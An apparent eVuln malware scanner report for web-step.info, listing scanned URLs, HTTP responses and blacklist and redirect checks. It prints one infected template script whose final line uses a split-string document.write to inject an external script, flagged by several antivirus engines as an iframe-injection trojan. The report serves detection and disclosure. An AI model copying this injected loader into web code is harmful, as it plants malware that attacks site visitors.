New scan:

Malware Scanner report for web-step.info

Malicious/Suspicious/Total urls checked
1/0/15
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://web-step.info/
200 OK
Content-Length: 51374
Content-Type: text/html
clean
http://web-step.info/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=highslide-full.min.js
200 OK
Content-Length: 70863
Content-Type: application/x-javascript
clean
http://web-step.info/plugins/system/cdscriptegrator/libraries/jquery/js/jsloader.php?files[]=jquery-1.4.4.min.js&files[]=jquery-noconflict.js
200 OK
Content-Length: 78623
Content-Type: application/x-javascript
clean
http://web-step.info/templates/gk_postnote/js/domready_fix.js
200 OK
Content-Length: 1345
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

Element.Events.domready = {
add: function(fn){
if (window.loaded){
fn.call(this);
return;
}
var domReady = function(){
if (window.loaded) return;
window.loaded = true;
window.timer = $clear(window.timer);
this.fireEvent('domready');
}.bind(this);
if (document.readyState && window.webkit){
window.timer = function(){
if (['loaded','complete'].contains(document.readyState)) domReady();
}.periodical(50);
} else {
window.addListener("load", domReady);
document.addListener("DOMContentLoaded", domReady);
}
}
};
;document.write("<scr"+"ipt src='/media/system/js/trigun.js'><"+"/script>");

Antivirus reports:

Ikarus
Trojan.IframeRef
Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Trojan:JS/IframeRef.J
Norman
IframeRef.DJ
Sophos
Mal/Iframe-AN

http://web-step.info/media/system/js/modal.js
200 OK
Content-Length: 10588
Content-Type: application/x-javascript
clean
http://web-step.info/components/com_k2/js/k2.js
200 OK
Content-Length: 3083
Content-Type: application/x-javascript
clean
http://web-step.info/plugins/system/cdscriptegrator/libraries/jquery/js/ui/jsloader.php?file=jquery-ui-1.8.7.custom.min.js
200 OK
Content-Length: 206618
Content-Type: application/x-javascript
clean
http://web-step.info/plugins/system/cdcaptcha/js/jquery.cdcaptcha.js
200 OK
Content-Length: 8071
Content-Type: application/x-javascript
clean
http://web-step.info/?cdcaptcha=getScript&random=hZLznikyyH1xO
200 OK
Content-Length: 684
Content-Type: application/x-javascript
clean
http://web-step.info/media/system/js/caption.js
200 OK
Content-Length: 1963
Content-Type: application/x-javascript
clean
http://web-step.info/templates/gk_postnote/js/gk.script.js
200 OK
Content-Length: 11781
Content-Type: application/x-javascript
clean
http://web-step.info/modules/mod_news_pro_gk4/interface/scripts/engine.js
200 OK
Content-Length: 8057
Content-Type: application/x-javascript
clean
http://web-step.info/templates/gk_postnote/js/menu/mega.js
200 OK
Content-Length: 17762
Content-Type: application/x-javascript
clean
http://pagead2.googlesyndication.com/pagead/show_ads.js
200 OK
Content-Length: 21308
Content-Type: text/javascript
clean
http://web-step.info/modules/mod_analytics/gatr.js
200 OK
Content-Length: 2019
Content-Type: application/x-javascript
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: web-step.info

Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Sun, 05 Oct 2014 13:59:37 GMT
Pragma: no-cache
Server: nginx admin
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sun, 05 Oct 2014 13:59:37 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: e33c804cae8d76ac876735b38cf8b8d1=8pnn8d2phj3ns420llgsld9mc6; path=/
Set-Cookie: gk_postnote_tpl=gk_postnote; expires=Fri, 25-Sep-2015 13:59:37 GMT; path=/
X-Cache: HIT from Backend
X-Powered-By: PHP/5.3.29
Second query (visit from search engine):
GET / HTTP/1.1
Host: web-step.info
Referer: http://www.google.com/search?q=web-step.info

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=web-step.info

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://web-step.info/

Result: web-step.info is not infected or malware details are not published yet.